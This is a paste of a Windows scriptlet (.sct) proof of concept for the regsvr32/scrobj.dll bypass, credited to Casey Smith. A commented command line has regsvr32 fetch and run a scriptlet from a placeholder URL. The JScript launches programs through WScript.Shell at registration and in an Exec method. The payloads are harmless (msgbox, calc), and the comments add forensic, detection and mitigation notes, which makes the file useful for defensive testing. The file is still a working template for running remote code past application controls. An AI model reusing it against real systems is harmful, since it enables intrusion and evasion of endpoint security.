
Untitled

a guest
Dec 7th, 2019
  1. <?XML version="1.0"?>
  2. <scriptlet>
  3. <!-- Windows Script Component (scriptlet): a registration block carrying inline JScript, plus one public method (Exec). -->
  4. <registration
  5. description="Bandit"
  6. progid="Bandit"
  7. version="1.00"
  8. classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
  9. >
  10. <!-- For analysts: the command line below points regsvr32 at a scriptlet URL and names scrobj.dll as the DLL (tracked as MITRE ATT&CK T1218.010, Regsvr32). -->
  11. <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll -->
  12. <!-- DFIR -->
  13. <!-- .sct files are downloaded and executed from a path like this -->
  14. <!-- Though, the name and extension are arbitrary. -->
  15. <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
  16. <!-- Based on current research, no registry keys are written, because the /u switch takes the unregister ("uninstall") path -->
  17. <!-- Detection: alert on regsvr32.exe command lines that combine /i: with a URL and scrobj.dll, on regsvr32.exe making outbound connections, and on child processes it spawns. -->
  18. <!-- Mitigation: deny regsvr32.exe outbound network access at the host firewall and restrict it through application-control policy where it is not needed. -->
  19. <!-- Proof Of Concept - Casey Smith @subTee -->
  20. <script language="JScript">
  21. <![CDATA[
  22. // Top-level statement, not wrapped in a function: presumably evaluated as soon as scrobj.dll processes this registration script (TODO confirm).
  23. var r = new ActiveXObject("WScript.Shell").Run("msgbox.exe");
  24.  
  25. ]]>
  26. </script>
  27. </registration>
  28. <!-- Public interface: declares a single method, Exec, whose body is in the script block below. -->
  29. <public>
  30. <method name="Exec"></method>
  31. </public>
  32. <script language="JScript">
  33. <![CDATA[
  34. // Exec backs the public method declared above; as a function body it runs only when something calls Exec.
  35. function Exec()
  36. {
  37. var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
  38. }
  39.  
  40. ]]>
  41. </script>
  42.  
  43. </scriptlet>